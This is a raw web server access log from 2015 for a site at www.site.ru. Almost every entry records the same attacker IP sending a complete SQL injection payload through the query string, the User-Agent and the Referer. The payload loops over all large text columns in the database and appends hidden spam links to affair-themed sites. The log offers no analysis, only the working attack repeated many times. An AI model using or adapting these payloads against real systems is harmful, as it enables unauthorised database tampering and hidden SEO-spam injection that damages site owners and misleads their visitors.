http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3230 0
2015-02-23 17:25:57 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2040 0
2015-02-23 17:26:06 GET /info.aspx infoid=20';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''when%20your%20husband%20cheats%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.gobiztech.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''men-having-affairs.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''what%20makes%20married%20men%20cheat''%20when%201%20then%20''what%20makes%20a%20husband%20cheat''%20else%20''my%20husband%20almost%20cheated%20on%20me''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20why%20do%20husbands%20have%20affairs''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3495 421
2015-02-23 17:26:07 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2198 328
2015-02-23 17:26:16 GET /info.aspx infoid=20;declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''when%20your%20husband%20cheats%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.gobiztech.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''men-having-affairs.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''what%20makes%20married%20men%20cheat''%20when%201%20then%20''what%20makes%20a%20husband%20cheat''%20else%20''my%20husband%20almost%20cheated%20on%20me''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20why%20do%20husbands%20have%20affairs''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 32324 3492 8656
2015-02-23 17:26:17 GET /scripts/wholesale-purses-0174.asp - 188.165.15.188 HTTP/1.0 Mozilla/5.0+(compatible;+AhrefsBot/5.0;++http://ahrefs.com/robot/) - www.site.ru 404 1906 309 0
2015-02-23 17:26:19 GET /info.aspx infoid=20);declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''when%20your%20husband%20cheats%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.gobiztech.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''men-having-affairs.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''what%20makes%20married%20men%20cheat''%20when%201%20then%20''what%20makes%20a%20husband%20cheat''%20else%20''my%20husband%20almost%20cheated%20on%20me''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20why%20do%20husbands%20have%20affairs''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3495 0
2015-02-23 17:26:19 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2198 15
2015-02-23 17:26:20 GET /info.aspx infoid=20');declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''when%20your%20husband%20cheats%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.gobiztech.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''men-having-affairs.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''what%20makes%20married%20men%20cheat''%20when%201%20then%20''what%20makes%20a%20husband%20cheat''%20else%20''my%20husband%20almost%20cheated%20on%20me''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20why%20do%20husbands%20have%20affairs''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3498 0
2015-02-23 17:26:20 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2200 0
2015-02-23 17:26:27 GET /info.aspx infoid=20';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''open%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''by-expression.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''my-girlfriend-started-to-communicate-with-ex%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20men%20cheat''%20when%201%20then%20''women%20who%20cheated''%20else%20''read''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20online''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- 